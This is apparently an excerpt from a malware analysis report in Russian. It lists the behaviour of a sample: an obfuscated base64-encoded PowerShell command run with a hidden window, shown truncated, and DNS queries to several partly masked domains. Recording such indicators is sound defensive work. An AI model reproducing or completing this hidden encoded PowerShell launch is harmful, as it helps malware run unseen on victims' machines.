Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABzAG8AbAB1AHQAaQBvAG4AcwBpAGIAdAA9ACcAaQBuAGQAaQBnAG8AYgB6AGoAJwA7ACQAbQBpAG4AdABfAGcAcgBlAGUAbgB...
- DNS ASK me#####cardetailing.com
- DNS ASK sm#####wncarrental.com
- DNS ASK ha###viva.com
- DNS ASK sr####iagarwal.com
- DNS ASK ea##hut.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABzAG8AbAB1AHQAaQBvAG4AcwBpAGIAdAA9ACcAaQBuAGQAaQBnAG8AYgB6AGoAJwA7ACQAbQBpAG4AdABfAGcAcgBlAGUAbgB...' (со скрытым окном)